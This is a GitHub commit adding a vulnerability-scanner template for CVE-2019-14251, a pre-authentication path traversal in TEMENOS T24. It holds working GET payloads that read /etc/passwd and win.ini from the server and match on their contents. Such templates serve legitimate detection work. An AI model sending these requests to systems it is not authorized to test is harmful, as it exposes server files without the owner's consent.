Create CVE-2019-14251.yaml

patch-1
Roberto Nunes 2022-07-08 06:58:09 +09:00 committed by GitHub
parent d878069f29
commit c9ff638860
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 36 additions and 0 deletions

36
CVE-2019-14251.yaml Normal file
View File

@ -0,0 +1,36 @@
id: CVE-2019-14251
info:
name: T24 in TEMENOS Channels R15.01 - Pre Authenticated Path Traversal
author: 0x_Akoko
severity: high
description: An unauthenticated path traversal vulnerability was discovered permitting an attacker to exfiltrate data directly from the T24 web server.
reference:
- https://github.com/kmkz/exploit/blob/master/CVE-2019-14251-TEMENOS-T24.txt
- https://www.cvedetails.com/cve/CVE-2019-14251
- https://vuldb.com/?id.146815
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-14251
cwe-id: CWE-22
tags: cve,cve2019,temenos,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd&"
- "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- "for 16-bit app support"
condition: or
- type: status
status:
- 200